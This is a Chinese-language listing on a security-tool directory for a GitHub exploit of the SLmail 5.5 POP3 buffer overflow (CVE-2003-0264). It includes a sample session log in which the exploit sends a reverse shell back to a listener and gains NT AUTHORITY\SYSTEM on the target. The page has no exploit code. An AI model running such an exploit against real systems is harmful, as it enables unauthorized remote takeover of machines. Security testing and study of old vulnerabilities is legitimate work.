Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2003-0264 — Exploit for CVE-2003-0264 based on pwntools and metasploit's windows/reverse_tcp | Kitploit
工具/GitHubGitHub/adenkiewicz/cve-2003-0264
Exploit FrameworksExploitationShellcodePenetration TestingPayload DevelopmentBinary Exploitation
GitHubadenkiewicz/cve-2003-0264

CVE-2003-0264

Exploit for CVE-2003-0264 based on pwntools and metasploit's windows/reverse_tcp

查看仓库
8年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2003-0264

针对SLmail 5.5中缓冲区溢出的利用程序 (CVE-2003-0264)

基于:

  • https://github.com/Gallopsled/pwntools
  • https://github.com/rapid7/metasploit-framework

示例输出:

root@kitploit:~
$ ./slmail-into-shell.py
[+] Opening connection to 192.168.15.100 on port 110: Done

[+] Trying to bind to 0.0.0.0 on port 4444: Done
[+] Waiting for connections on 0.0.0.0:4444: Got connection from 192.168.15.100 on port 49168
[*] Received server hello
[*] Switching to interactive mode
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\SLmail\System>$ whoami
whoami
nt authority\system
 
C:\Program Files (x86)\SLmail\System>$
[*] Closed connection to 192.168.15.100 port 49168
[*] Closed connection to 192.168.15.100 port 110
下载工具